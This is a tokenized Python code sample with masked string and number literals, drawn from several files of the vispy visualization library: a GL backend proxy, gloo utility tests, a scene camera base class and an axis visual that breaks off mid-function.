xyz [ ~ over ] = ( xyz [ ~ over ] - <NUM_LIT> ) / <NUM_LIT> <EOL> rgbs = np . dot ( _xyz2rgb_norm , xyz ) . T <EOL> over = rgbs > <NUM_LIT> <EOL> rgbs [ over ] = <NUM_LIT> * ( rgbs [ over ] ** ( <NUM_LIT:1.> / <NUM_LIT> ) ) - <NUM_LIT> <EOL> rgbs [ ~ over ] *= <NUM_LIT> <EOL> if n_dim == <NUM_LIT:4> : <EOL> rgbs = np . concatenate ( ( rgbs , labs [ : , <NUM_LIT:3> ] ) , axis = <NUM_LIT:1> ) <EOL> rgbs = np . clip ( rgbs , <NUM_LIT:0.> , <NUM_LIT:1.> ) <EOL> return rgbs </s>
<s> from sys import version_info <EOL> if version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> from collections import OrderedDict <EOL> else : <EOL> from . _bundled . ordereddict import OrderedDict </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import os <EOL> from ... util import config , logger <EOL> from . _constants import * <EOL> from . _proxy import BaseGLProxy <EOL> current_backend = None <EOL> class MainProxy ( BaseGLProxy ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , funcname , returns , * args ) : <EOL> func = getattr ( current_backend , funcname ) <EOL> return func ( * args ) <EOL> class DebugProxy ( BaseGLProxy ) : <EOL> """<STR_LIT>""" <EOL> def _arg_repr ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> r = repr ( arg ) <EOL> max = <NUM_LIT> <EOL> if len ( r ) > max : <EOL> if hasattr ( arg , '<STR_LIT>' ) : <EOL> r = '<STR_LIT>' + '<STR_LIT:x>' . join ( [ repr ( s ) for s in arg . shape ] ) <EOL> else : <EOL> r = r [ : max - <NUM_LIT:3> ] + '<STR_LIT>' <EOL> return r <EOL> def __call__ ( self , funcname , returns , * args ) : <EOL> if funcname == '<STR_LIT>' : <EOL> func = getattr ( current_backend , funcname ) <EOL> return func ( ) <EOL> argstr = '<STR_LIT:U+002CU+0020>' . join ( map ( self . _arg_repr , args ) ) <EOL> logger . debug ( "<STR_LIT>" % ( funcname , argstr ) ) <EOL> func = getattr ( current_backend , funcname ) <EOL> ret = func ( * args ) <EOL> if returns : <EOL> logger . debug ( "<STR_LIT>" % repr ( ret ) ) <EOL> check_error ( funcname ) <EOL> return ret <EOL> proxy = MainProxy ( ) <EOL> _debug_proxy = DebugProxy ( ) <EOL> def use_gl ( target = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> target = target or '<STR_LIT>' <EOL> target = target . replace ( '<STR_LIT:+>' , '<STR_LIT>' ) <EOL> target , _ , options = target . 
partition ( '<STR_LIT:U+0020>' ) <EOL> debug = config [ '<STR_LIT>' ] or '<STR_LIT>' in options <EOL> try : <EOL> mod = __import__ ( target , globals ( ) , level = <NUM_LIT:1> ) <EOL> except ImportError as err : <EOL> msg = '<STR_LIT>' % ( target , str ( err ) ) <EOL> raise RuntimeError ( msg ) <EOL> global current_backend <EOL> current_backend = mod <EOL> _clear_namespace ( ) <EOL> if '<STR_LIT>' in target : <EOL> _copy_gl_functions ( mod . _pyopengl2 , globals ( ) ) <EOL> _copy_gl_functions ( mod , globals ( ) , True ) <EOL> elif debug : <EOL> _copy_gl_functions ( _debug_proxy , globals ( ) ) <EOL> else : <EOL> _copy_gl_functions ( mod , globals ( ) ) <EOL> def _clear_namespace ( ) : <EOL> """<STR_LIT>""" <EOL> ok_names = set ( default_backend . __dict__ ) <EOL> ok_names . update ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> NS = globals ( ) <EOL> for name in list ( NS . keys ( ) ) : <EOL> if name . lower ( ) . startswith ( '<STR_LIT>' ) : <EOL> if name not in ok_names : <EOL> del NS [ name ] <EOL> def _copy_gl_functions ( source , dest , constants = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( source , BaseGLProxy ) : <EOL> s = { } <EOL> for key in dir ( source ) : <EOL> s [ key ] = getattr ( source , key ) <EOL> source = s <EOL> elif not isinstance ( source , dict ) : <EOL> source = source . __dict__ <EOL> if not isinstance ( dest , dict ) : <EOL> dest = dest . __dict__ <EOL> funcnames = [ name for name in source . keys ( ) if name . startswith ( '<STR_LIT>' ) ] <EOL> for name in funcnames : <EOL> dest [ name ] = source [ name ] <EOL> if constants : <EOL> constnames = [ name for name in source . keys ( ) if name . startswith ( '<STR_LIT>' ) ] <EOL> for name in constnames : <EOL> dest [ name ] = source [ name ] <EOL> def check_error ( when = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> while True : <EOL> err = glGetError ( ) <EOL> if err == GL_NO_ERROR or ( errors and err == errors [ - <NUM_LIT:1> ] ) : <EOL> break <EOL> errors . 
append ( err ) <EOL> if errors : <EOL> msg = '<STR_LIT:U+002CU+0020>' . join ( [ repr ( ENUM_MAP . get ( e , e ) ) for e in errors ] ) <EOL> err = RuntimeError ( '<STR_LIT>' % ( when , msg ) ) <EOL> err . errors = errors <EOL> err . err = errors [ - <NUM_LIT:1> ] <EOL> raise err <EOL> def _fix_osmesa_gl_lib_if_testing ( ) : <EOL> """<STR_LIT>""" <EOL> test_name = os . getenv ( '<STR_LIT>' , None ) <EOL> if test_name == '<STR_LIT>' : <EOL> from ... util . osmesa_gl import fix_osmesa_gl_lib <EOL> fix_osmesa_gl_lib ( ) <EOL> _fix_osmesa_gl_lib_if_testing ( ) <EOL> from . import gl2 as default_backend <EOL> use_gl ( ) </s>
<s> from vispy . gloo import util <EOL> from vispy . testing import run_tests_if_main , assert_raises <EOL> def test_check_enum ( ) : <EOL> from vispy . gloo import gl <EOL> assert util . check_enum ( gl . GL_RGB ) == '<STR_LIT>' <EOL> assert util . check_enum ( gl . GL_TRIANGLE_STRIP ) == '<STR_LIT>' <EOL> assert util . check_enum ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert util . check_enum ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert_raises ( ValueError , util . check_enum , int ( gl . GL_RGB ) ) <EOL> assert_raises ( ValueError , util . check_enum , int ( gl . GL_TRIANGLE_STRIP ) ) <EOL> assert_raises ( ValueError , util . check_enum , [ ] ) <EOL> util . check_enum ( '<STR_LIT>' , '<STR_LIT:test>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' <EOL> util . check_enum ( gl . GL_ALPHA , '<STR_LIT:test>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' <EOL> assert_raises ( ValueError , util . check_enum , '<STR_LIT>' , '<STR_LIT:test>' , ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ) <EOL> assert_raises ( ValueError , util . check_enum , gl . GL_ALPHA , '<STR_LIT:test>' , ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ) <EOL> try : <EOL> from OpenGL import GL <EOL> except ImportError : <EOL> return <EOL> assert util . check_enum ( GL . GL_RGB ) == '<STR_LIT>' <EOL> assert util . check_enum ( GL . GL_TRIANGLE_STRIP ) == '<STR_LIT>' <EOL> def test_check_identifier ( ) : <EOL> assert util . check_identifier ( '<STR_LIT:foo>' ) is None <EOL> assert util . check_identifier ( '<STR_LIT>' ) is None <EOL> assert util . check_identifier ( '<STR_LIT>' ) is None <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_variable ( '<STR_LIT:foo>' ) is None <EOL> assert util . 
check_variable ( '<STR_LIT:a>' * <NUM_LIT:30> ) is None <EOL> assert util . check_variable ( '<STR_LIT:a>' * <NUM_LIT:32> ) <EOL> run_tests_if_main ( ) </s>
<s> from __future__ import division <EOL>
from ... util import keys <EOL>
from . . node import Node <EOL>
from ... visuals . transforms import ( STTransform , MatrixTransform , <EOL> NullTransform , TransformCache ) <EOL>
# Base class for scene cameras: owns the viewbox connection, the scene
# transform, flip/up/center/fov state, and camera-to-camera state linking.
class BaseCamera ( Node ) : <EOL>
"""<STR_LIT>""" <EOL>
# Names of properties that participate in get_state/set_state.
_state_props = ( ) <EOL>
zoom_factor = <NUM_LIT> <EOL>
def __init__ ( self , interactive = True , flip = None , up = '<STR_LIT>' , parent = None , <EOL> name = None ) : <EOL>
super ( BaseCamera , self ) . __init__ ( parent , name ) <EOL>
self . _viewbox = None <EOL>
self . _linked_cameras = [ ] <EOL>
# Guard used to avoid ping-pong updates between linked cameras.
self . _linked_cameras_no_update = None <EOL>
self . transform = NullTransform ( ) <EOL>
self . _pre_transform = None <EOL>
self . _viewbox_tr = STTransform ( ) <EOL>
self . _projection = MatrixTransform ( ) <EOL>
self . _transform_cache = TransformCache ( ) <EOL>
self . _event_value = None <EOL>
# While True, view_changed() is suppressed (used during set_range).
self . _resetting = False <EOL>
self . _key_events_bound = False <EOL>
self . _set_range_args = None <EOL>
self . _xlim = None <EOL>
self . _ylim = None <EOL>
self . _zlim = None <EOL>
self . _default_state = None <EOL>
self . _fov = <NUM_LIT:0.0> <EOL>
self . _center = None <EOL>
self . _depth_value = <NUM_LIT> <EOL>
self . interactive = bool ( interactive ) <EOL>
self . flip = flip if ( flip is not None ) else ( False , False , False ) <EOL>
self . up = up <EOL>
@ property <EOL>
def depth_value ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _depth_value <EOL>
@ depth_value . setter <EOL>
def depth_value ( self , value ) : <EOL>
value = float ( value ) <EOL>
if value <= <NUM_LIT:0> : <EOL>
raise ValueError ( '<STR_LIT>' ) <EOL>
self . _depth_value = value <EOL>
self . view_changed ( ) <EOL>
# Map a depth fraction onto a z value spanning [+val, -val].
def _depth_to_z ( self , depth ) : <EOL>
"""<STR_LIT>""" <EOL>
val = self . depth_value <EOL>
return val - depth * <NUM_LIT:2> * val <EOL>
# Attach to a viewbox: store it and subscribe to its mouse/resize events.
def _viewbox_set ( self , viewbox ) : <EOL>
"""<STR_LIT>""" <EOL>
self . _viewbox = viewbox <EOL>
viewbox . events . mouse_press . connect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . mouse_release . connect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . mouse_move . connect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . mouse_wheel . connect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . resize . connect ( self . viewbox_resize_event ) <EOL>
# Detach from the viewbox: mirror image of _viewbox_set.
def _viewbox_unset ( self , viewbox ) : <EOL>
"""<STR_LIT>""" <EOL>
self . _viewbox = None <EOL>
viewbox . events . mouse_press . disconnect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . mouse_release . disconnect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . mouse_move . disconnect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . mouse_wheel . disconnect ( self . viewbox_mouse_event ) <EOL>
viewbox . events . resize . disconnect ( self . viewbox_resize_event ) <EOL>
@ property <EOL>
def viewbox ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _viewbox <EOL>
@ property <EOL>
def interactive ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _interactive <EOL>
@ interactive . setter <EOL>
def interactive ( self , value ) : <EOL>
self . _interactive = bool ( value ) <EOL>
@ property <EOL>
def flip ( self ) : <EOL>
return self . _flip <EOL>
@ flip . setter <EOL>
def flip ( self , value ) : <EOL>
# Accept a 2- or 3-tuple of booleans; a missing z component means False.
if not isinstance ( value , ( list , tuple ) ) : <EOL>
raise ValueError ( '<STR_LIT>' ) <EOL>
if len ( value ) == <NUM_LIT:2> : <EOL>
self . _flip = bool ( value [ <NUM_LIT:0> ] ) , bool ( value [ <NUM_LIT:1> ] ) , False <EOL>
elif len ( value ) == <NUM_LIT:3> : <EOL>
self . _flip = bool ( value [ <NUM_LIT:0> ] ) , bool ( value [ <NUM_LIT:1> ] ) , bool ( value [ <NUM_LIT:2> ] ) <EOL>
else : <EOL>
raise ValueError ( '<STR_LIT>' ) <EOL>
# Per-axis scale factors: True -> -1, False -> +1.
self . _flip_factors = tuple ( [ ( <NUM_LIT:1> - x * <NUM_LIT:2> ) for x in self . _flip ] ) <EOL>
self . view_changed ( ) <EOL>
@ property <EOL>
def up ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _up <EOL>
@ up . setter <EOL>
def up ( self , value ) : <EOL>
# Normalize to a signed axis name ('+'-prefixed when no sign given).
value = value . lower ( ) <EOL>
value = ( '<STR_LIT:+>' + value ) if value in '<STR_LIT>' else value <EOL>
if value not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL>
raise ValueError ( '<STR_LIT>' ) <EOL>
self . _up = value <EOL>
self . view_changed ( ) <EOL>
@ property <EOL>
def center ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _center or ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL>
@ center . setter <EOL>
def center ( self , val ) : <EOL>
# Accept an (x, y) or (x, y, z) tuple; z defaults to 0.
if len ( val ) == <NUM_LIT:2> : <EOL>
self . _center = float ( val [ <NUM_LIT:0> ] ) , float ( val [ <NUM_LIT:1> ] ) , <NUM_LIT:0.0> <EOL>
elif len ( val ) == <NUM_LIT:3> : <EOL>
self . _center = float ( val [ <NUM_LIT:0> ] ) , float ( val [ <NUM_LIT:1> ] ) , float ( val [ <NUM_LIT:2> ] ) <EOL>
else : <EOL>
raise ValueError ( '<STR_LIT>' ) <EOL>
self . view_changed ( ) <EOL>
@ property <EOL>
def fov ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _fov <EOL>
@ fov . setter <EOL>
def fov ( self , fov ) : <EOL>
fov = float ( fov ) <EOL>
if fov < <NUM_LIT:0> or fov >= <NUM_LIT> : <EOL>
raise ValueError ( "<STR_LIT>" ) <EOL>
self . _fov = fov <EOL>
self . view_changed ( ) <EOL>
# Set the visible range per axis; missing axes fall back to the scene
# bounds. If no viewbox is attached yet, the arguments are stored and
# replayed later by view_changed().
def set_range ( self , x = None , y = None , z = None , margin = <NUM_LIT> ) : <EOL>
"""<STR_LIT>""" <EOL>
init = self . _xlim is None <EOL>
bounds = [ None , None , None ] <EOL>
if x is not None : <EOL>
bounds [ <NUM_LIT:0> ] = float ( x [ <NUM_LIT:0> ] ) , float ( x [ <NUM_LIT:1> ] ) <EOL>
if y is not None : <EOL>
bounds [ <NUM_LIT:1> ] = float ( y [ <NUM_LIT:0> ] ) , float ( y [ <NUM_LIT:1> ] ) <EOL>
if z is not None : <EOL>
bounds [ <NUM_LIT:2> ] = float ( z [ <NUM_LIT:0> ] ) , float ( z [ <NUM_LIT:1> ] ) <EOL>
if self . _viewbox is None : <EOL>
self . _set_range_args = bounds [ <NUM_LIT:0> ] , bounds [ <NUM_LIT:1> ] , bounds [ <NUM_LIT:2> ] , margin <EOL>
return <EOL>
# Suppress view_changed while we mutate limits/center.
self . _resetting = True <EOL>
if all ( [ ( b is None ) for b in bounds ] ) : <EOL>
bounds = self . _viewbox . get_scene_bounds ( ) <EOL>
else : <EOL>
for i in range ( <NUM_LIT:3> ) : <EOL>
if bounds [ i ] is None : <EOL>
bounds [ i ] = self . _viewbox . get_scene_bounds ( i ) <EOL>
ranges = [ b [ <NUM_LIT:1> ] - b [ <NUM_LIT:0> ] for b in bounds ] <EOL>
# Zero-extent axes get a fixed fallback margin instead of r * margin.
margins = [ ( r * margin or <NUM_LIT:0.1> ) for r in ranges ] <EOL>
bounds_margins = [ ( b [ <NUM_LIT:0> ] - m , b [ <NUM_LIT:1> ] + m ) for b , m in zip ( bounds , margins ) ] <EOL>
self . _xlim , self . _ylim , self . _zlim = bounds_margins <EOL>
if ( not init ) or ( self . _center is None ) : <EOL>
self . _center = [ ( b [ <NUM_LIT:0> ] + r / <NUM_LIT:2> ) for b , r in zip ( bounds , ranges ) ] <EOL>
# Let the subclass apply the new range, then fire one update.
self . _set_range ( init ) <EOL>
self . _resetting = False <EOL>
self . view_changed ( ) <EOL>
# Subclass hook called by set_range; the base implementation is a no-op.
def _set_range ( self , init ) : <EOL>
pass <EOL>
def reset ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
self . set_state ( self . _default_state ) <EOL>
def set_default_state ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
self . _default_state = self . get_state ( ) <EOL>
def get_state ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
D = { } <EOL>
for key in self . _state_props : <EOL>
D [ key ] = getattr ( self , key ) <EOL>
return D <EOL>
def set_state ( self , state = None , ** kwargs ) : <EOL>
"""<STR_LIT>""" <EOL>
D = state or { } <EOL>
D . update ( kwargs ) <EOL>
for key , val in D . items ( ) : <EOL>
if key not in self . _state_props : <EOL>
raise KeyError ( '<STR_LIT>' % key ) <EOL>
setattr ( self , key , val ) <EOL>
# Link two cameras so state changes propagate both ways; existing links
# between the pair are removed first to avoid duplicates.
def link ( self , camera ) : <EOL>
"""<STR_LIT>""" <EOL>
cam1 , cam2 = self , camera <EOL>
while cam1 in cam2 . _linked_cameras : <EOL>
cam2 . _linked_cameras . remove ( cam1 ) <EOL>
while cam2 in cam1 . _linked_cameras : <EOL>
cam1 . _linked_cameras . remove ( cam2 ) <EOL>
cam1 . _linked_cameras . append ( cam2 ) <EOL>
cam2 . _linked_cameras . append ( cam1 ) <EOL>
# Called whenever camera state changes; performs lazy first-time range
# and default-state setup, then rebuilds the scene transform.
def view_changed ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
if self . _resetting : <EOL>
return <EOL>
if self . _viewbox : <EOL>
if self . _xlim is None : <EOL>
args = self . _set_range_args or ( ) <EOL>
self . set_range ( * args ) <EOL>
if self . _default_state is None : <EOL>
self . set_default_state ( ) <EOL>
self . _update_transform ( ) <EOL>
@ property <EOL>
def pre_transform ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . _pre_transform <EOL>
@ pre_transform . setter <EOL>
def pre_transform ( self , tr ) : <EOL>
self . _pre_transform = tr <EOL>
self . view_changed ( ) <EOL>
# Subclasses override to implement interaction; base does nothing.
def viewbox_mouse_event ( self , event ) : <EOL>
"""<STR_LIT>""" <EOL>
pass <EOL>
# Re-bind key events when the canvas owning the viewbox changes.
def on_canvas_change ( self , event ) : <EOL>
"""<STR_LIT>""" <EOL>
if event . old is not None : <EOL>
event . old . events . key_press . disconnect ( self . viewbox_key_event ) <EOL>
event . old . events . key_release . disconnect ( self . viewbox_key_event ) <EOL>
if event . new is not None : <EOL>
event . new . events . key_press . connect ( self . viewbox_key_event ) <EOL>
event . new . events . key_release . connect ( self . viewbox_key_event ) <EOL>
# Backspace resets the camera to its default state.
def viewbox_key_event ( self , event ) : <EOL>
"""<STR_LIT>""" <EOL>
if event . key == keys . BACKSPACE : <EOL>
self . reset ( ) <EOL>
def viewbox_resize_event ( self , event ) : <EOL>
"""<STR_LIT>""" <EOL>
pass <EOL>
def _update_transform ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
self . _set_scene_transform ( self . transform ) <EOL>
# Compose pre_transform with *tr*, install the result on the viewbox
# scene, and mirror this camera's state onto linked cameras (guarding
# against infinite back-and-forth updates).
def _set_scene_transform ( self , tr ) : <EOL>
"""<STR_LIT>""" <EOL>
pre_tr = self . pre_transform <EOL>
if pre_tr is None : <EOL>
self . _scene_transform = tr <EOL>
else : <EOL>
self . _transform_cache . roll ( ) <EOL>
self . _scene_transform = self . _transform_cache . get ( [ pre_tr , tr ] ) <EOL>
self . _scene_transform . dynamic = True <EOL>
self . _viewbox . scene . transform = self . _scene_transform <EOL>
self . _viewbox . update ( ) <EOL>
for cam in self . _linked_cameras : <EOL>
if cam is self . _linked_cameras_no_update : <EOL>
continue <EOL>
try : <EOL>
cam . _linked_cameras_no_update = self <EOL>
cam . set_state ( self . get_state ( ) ) <EOL>
finally : <EOL>
cam . _linked_cameras_no_update = None </s>
<s> class SimpleBunch ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> dict . __init__ ( self , kwargs ) <EOL> self . __dict__ = self </s>
<s> namespace = '<STR_LIT>' <EOL> dpi = <NUM_LIT> <EOL> units = { <EOL> None : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : dpi , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT>' : dpi / <NUM_LIT> , <EOL> '<STR_LIT:%>' : <NUM_LIT:1> / <NUM_LIT> <EOL> } </s>
<s> import numpy as np <EOL>
from . visual import CompoundVisual <EOL>
from . line import LineVisual <EOL>
from . text import TextVisual <EOL>
# NOTE(review): this excerpt is truncated -- Ticker._get_tick_frac_labels
# is cut off mid-statement at the end of this chunk.
# Axis visual composed of an axis line, tick lines, and tick-label text.
class AxisVisual ( CompoundVisual ) : <EOL>
"""<STR_LIT>""" <EOL>
def __init__ ( self , pos = None , domain = ( <NUM_LIT:0.> , <NUM_LIT:1.> ) , tick_direction = ( - <NUM_LIT:1.> , <NUM_LIT:0.> ) , <EOL> scale_type = "<STR_LIT>" , axis_color = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> tick_color = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , text_color = '<STR_LIT:w>' , font_size = <NUM_LIT:8> ) : <EOL>
# Only the default scale type is implemented.
if scale_type != '<STR_LIT>' : <EOL>
raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL>
self . _pos = None <EOL>
self . _domain = None <EOL>
self . _stop_at_major = ( False , False ) <EOL>
self . ticker = Ticker ( self ) <EOL>
self . tick_direction = np . array ( tick_direction , float ) <EOL>
# NOTE(review): redundant self-assignment -- has no effect.
self . tick_direction = self . tick_direction <EOL>
self . scale_type = scale_type <EOL>
self . axis_color = axis_color <EOL>
self . tick_color = tick_color <EOL>
# Tick geometry parameters (in document/pixel units).
self . minor_tick_length = <NUM_LIT:5> <EOL>
self . major_tick_length = <NUM_LIT:10> <EOL>
self . label_margin = <NUM_LIT:5> <EOL>
self . _need_update = True <EOL>
# Sub-visuals: the axis line, the tick segments, and the labels.
self . _line = LineVisual ( method = '<STR_LIT>' , width = <NUM_LIT> ) <EOL>
self . _ticks = LineVisual ( method = '<STR_LIT>' , width = <NUM_LIT> , connect = '<STR_LIT>' ) <EOL>
self . _text = TextVisual ( font_size = font_size , color = text_color ) <EOL>
CompoundVisual . __init__ ( self , [ self . _line , self . _text , self . _ticks ] ) <EOL>
if pos is not None : <EOL>
self . pos = pos <EOL>
self . domain = domain <EOL>
@ property <EOL>
def pos ( self ) : <EOL>
return self . _pos <EOL>
@ pos . setter <EOL>
def pos ( self , pos ) : <EOL>
self . _pos = np . array ( pos , float ) <EOL>
self . _need_update = True <EOL>
self . update ( ) <EOL>
@ property <EOL>
def domain ( self ) : <EOL>
return self . _domain <EOL>
@ domain . setter <EOL>
def domain ( self , d ) : <EOL>
# Only mark dirty when the domain actually changes.
if self . _domain is None or d != self . _domain : <EOL>
self . _domain = d <EOL>
self . _need_update = True <EOL>
self . update ( ) <EOL>
@ property <EOL>
def _vec ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
return self . pos [ <NUM_LIT:1> ] - self . pos [ <NUM_LIT:0> ] <EOL>
# Push freshly computed tick/label geometry into the sub-visuals.
def _update_subvisuals ( self ) : <EOL>
tick_pos , labels , label_pos , anchors = self . ticker . get_update ( ) <EOL>
self . _line . set_data ( pos = self . pos , color = self . axis_color ) <EOL>
self . _ticks . set_data ( pos = tick_pos , color = self . tick_color ) <EOL>
self . _text . text = list ( labels ) <EOL>
self . _text . pos = label_pos <EOL>
self . _text . anchors = anchors <EOL>
self . _need_update = False <EOL>
def _prepare_draw ( self , view ) : <EOL>
# Nothing to draw until a position has been set.
if self . _pos is None : <EOL>
return False <EOL>
if self . _need_update : <EOL>
self . _update_subvisuals ( ) <EOL>
def _compute_bounds ( self , axis , view ) : <EOL>
if axis == <NUM_LIT:2> : <EOL>
return ( <NUM_LIT:0.> , <NUM_LIT:0.> ) <EOL>
return self . pos [ : , axis ] . min ( ) , self . pos [ : , axis ] . max ( ) <EOL>
# Computes tick fractions/labels and their document-space positions for
# the owning AxisVisual.
class Ticker ( object ) : <EOL>
"""<STR_LIT>""" <EOL>
def __init__ ( self , axis ) : <EOL>
self . axis = axis <EOL>
def get_update ( self ) : <EOL>
major_tick_fractions , minor_tick_fractions , tick_labels = self . _get_tick_frac_labels ( ) <EOL>
tick_pos , label_pos , anchors = self . _get_tick_positions ( <EOL> major_tick_fractions , minor_tick_fractions ) <EOL>
return tick_pos , tick_labels , label_pos , anchors <EOL>
def _get_tick_positions ( self , major_tick_fractions , minor_tick_fractions ) : <EOL>
trs = self . axis . transforms <EOL>
visual_to_document = trs . get_transform ( '<STR_LIT>' , '<STR_LIT>' ) <EOL>
direction = np . array ( self . axis . tick_direction ) <EOL>
direction /= np . linalg . norm ( direction ) <EOL>
# Choose text anchors from the tick direction's sign per axis.
anchors = [ ] <EOL>
if direction [ <NUM_LIT:0> ] < <NUM_LIT:0> : <EOL>
anchors . append ( '<STR_LIT:right>' ) <EOL>
elif direction [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL>
anchors . append ( '<STR_LIT:left>' ) <EOL>
else : <EOL>
anchors . append ( '<STR_LIT>' ) <EOL>
if direction [ <NUM_LIT:1> ] < <NUM_LIT:0> : <EOL>
anchors . append ( '<STR_LIT>' ) <EOL>
elif direction [ <NUM_LIT:1> ] > <NUM_LIT:0> : <EOL>
anchors . append ( '<STR_LIT>' ) <EOL>
else : <EOL>
anchors . append ( '<STR_LIT>' ) <EOL>
# Length of one tick-direction unit in document coordinates, used to
# convert pixel tick lengths back into visual coordinates.
doc_unit = visual_to_document . map ( [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , direction [ : <NUM_LIT:2> ] ] ) <EOL>
doc_unit = doc_unit [ <NUM_LIT:1> ] - doc_unit [ <NUM_LIT:0> ] <EOL>
doc_len = np . linalg . norm ( doc_unit ) <EOL>
vectors = np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> direction * self . axis . minor_tick_length / doc_len , <EOL> direction * self . axis . major_tick_length / doc_len , <EOL> direction * ( self . axis . major_tick_length + <EOL> self . axis . label_margin ) / doc_len ] , <EOL> dtype = float ) <EOL>
minor_vector = vectors [ <NUM_LIT:1> ] - vectors [ <NUM_LIT:0> ] <EOL>
major_vector = vectors [ <NUM_LIT:2> ] - vectors [ <NUM_LIT:0> ] <EOL>
label_vector = vectors [ <NUM_LIT:3> ] - vectors [ <NUM_LIT:0> ] <EOL>
major_origins , major_endpoints = self . _tile_ticks ( <EOL> major_tick_fractions , major_vector ) <EOL>
minor_origins , minor_endpoints = self . _tile_ticks ( <EOL> minor_tick_fractions , minor_vector ) <EOL>
tick_label_pos = major_origins + label_vector <EOL>
num_major = len ( major_tick_fractions ) <EOL>
num_minor = len ( minor_tick_fractions ) <EOL>
# Interleave origin/endpoint pairs so the line visual draws segments.
c = np . empty ( [ ( num_major + num_minor ) * <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL>
c [ <NUM_LIT:0> : ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:1> : <NUM_LIT:2> ] = major_origins <EOL>
c [ <NUM_LIT:1> : ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:2> : <NUM_LIT:2> ] = major_endpoints <EOL>
c [ ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:2> : : <NUM_LIT:2> ] = minor_origins <EOL>
c [ ( num_major - <NUM_LIT:1> ) * <NUM_LIT:2> + <NUM_LIT:3> : : <NUM_LIT:2> ] = minor_endpoints <EOL>
return c , tick_label_pos , anchors <EOL>
# Place ticks at the given fractions along the axis vector.
def _tile_ticks ( self , frac , tickvec ) : <EOL>
"""<STR_LIT>""" <EOL>
origins = np . tile ( self . axis . _vec , ( len ( frac ) , <NUM_LIT:1> ) ) <EOL>
origins = self . axis . pos [ <NUM_LIT:0> ] . T + ( origins . T * frac ) . T <EOL>
endpoints = tickvec + origins <EOL>
return origins , endpoints <EOL>
# Compute major/minor tick fractions and label strings for the current
# domain. (Body truncated at the end of this excerpt.)
def _get_tick_frac_labels ( self ) : <EOL>
"""<STR_LIT>""" <EOL>
minor_num = <NUM_LIT:4> <EOL>
if ( self . axis . scale_type == '<STR_LIT>' ) : <EOL>
domain = self . axis . domain <EOL>
if domain [ <NUM_LIT:1> ] < domain [ <NUM_LIT:0> ] : <EOL>
flip = True <EOL>
domain = domain [ : : - <NUM_LIT:1> ] <EOL>
else : <EOL>
flip = False <EOL>
offset = domain [ <NUM_LIT:0> ] <EOL>
scale = domain [ <NUM_LIT:1> ] - domain [ <NUM_LIT:0> ] <EOL>
transforms = self . axis . transforms <EOL>
length = self . axis . pos [ <NUM_LIT:1> ] - self . axis . pos [ <NUM_LIT:0> ] <EOL>
n_inches = np . sqrt ( np . sum ( length ** <NUM_LIT:2> ) ) / transforms . dpi <EOL>
major = _get_ticks_talbot ( domain [ <NUM_LIT:0> ] , domain [ <NUM_LIT:1> ] , n_inches , <NUM_LIT:2> ) <EOL>
